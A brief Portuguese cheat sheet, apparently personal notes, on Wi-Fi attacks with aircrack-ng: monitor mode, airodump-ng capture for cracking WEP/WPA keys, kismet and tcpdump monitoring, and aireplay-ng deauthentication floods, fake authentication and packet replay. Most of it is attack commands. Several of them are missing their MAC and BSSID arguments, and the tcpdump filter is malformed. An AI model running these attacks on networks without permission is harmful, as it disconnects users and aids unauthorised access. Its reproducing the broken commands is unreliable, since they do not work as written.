Aircrack
> Para colocar em modo monitor:
- airmon-ng
> Para capturar pacotes:
- airodump-ng wlanx # Pega em todos os canais, e não salva em arquivo
- airodump-ng -w /root/nome_do_arquivo.pcap --output-format pcap --channel x wlanx # Pegando em um canal específico e salvando o arquivo em /root. Este arquivo serve para quebrar a chave WEP ou WPA (2).
- airodump-ng --bssid -w /root/nome_do_arquivo.pcap --channel x wlanx # Para monitorar um roteador específico.
- kismet # Este serve, entre outras coisas, para monitorar ataques pelo seus alertas. Seu arquivo de configuração encontra-se em usr/etc/kismet.conf, comentar a linha da interface de rede"ncsource=wlanx". Para executá-lo primeiro inicia o servidor e depois o cliente, para então poder capturar pacotes. Este também serve para atualizar GPS, e utilizar a técnica de Wardriving.
> Para mostrar os pacotes que entram na interface:
- tcpdump -n -e -s0 -vvv -i wlanx # Mostra os pacotes que estão entrando na interface.
- tcpdump -n -e -s0 -vvv -i wlanx |DeAut # FIltra os pacotes de desautenticação.
> Ataques:
Desautenticação:
- aireplay-ng -0 0 -a -c wlanx # O número 0 é a quantidades de pacotes que se deseja enviar, no caso o 0 é infito. O segundo mac é o mac do cliente que estava associado, ou termina o comando sem o "-c" para ele fazer um broadcast.
Autenticação False
- aireplay-ng -1 0 -e teddy -a -h wlanx # teddy é o nome da rede. Este só serve quando a criptografia é do tipo WEP.
Retransmissão interativa de pacotes
- aireplay-ng -2 -b -d FF:FF:FF:FF:FF:FF -t 1 wlanx # Serve para inundar as redes de pacotes, para então conseguir mais informação para realizar os ataques. Espera pacotes de dados, para então capturar um e forjar com outro igual. Para este ataque se faz necessário estar associado e autenticado ao AP, caso contrário o roteador não irá aceitar os pacotes, para isso usa-se antes o ataque de Autenticação